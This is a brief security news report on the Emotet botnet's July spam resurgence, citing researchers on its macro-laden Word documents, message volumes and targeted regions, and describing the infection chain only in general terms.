Emotet, one of the most dangerous world’s botnets, has surged to life from a five-month hiatus and once more began sending spam aimed at delivering a backdoor that installs ransomware, banking trojans, and other kinds of malware.
According to Malwarebytes Labs, first signs of a malspam campaign were spotted on July 13, then several days later, on July 17, the Emotet botnets began actively spreading spam messages using the same techniques, as with previous malicious campaigns.
Malicious emails contain either a URL or an attachment that link to malicious Word files. One familiar technique is for the document to be sent as a reply within existing email threads. The malicious document contains a heavily obfuscated macro, which, when enabled, launches PowerShell to retrieve the Emotet binary from one of the remote compromised websites. Once the payload is executed, it will send a confirmation back to one of Emotet’s command and control server.
As per Sherrod DeGrippo, senior director of threat research and detection at security firm Proofpoint, the botnet has been observed sending 250,000 messages during the day, mostly to victims in the United States and the United Kingdom. According to other researchers who have been observing Emotet’s activities, targets were also located in the Middle East, South America, and Africa.
The Emotet botnet is known for launching massive campaigns which usually last for short periods of time and then going dormant for weeks or months at the time. True to its MO, the latest Emotet campaign had completely stopped on July 18. Indicators of compromise from the recent Emotet’s spamming spree can found here, here, and here.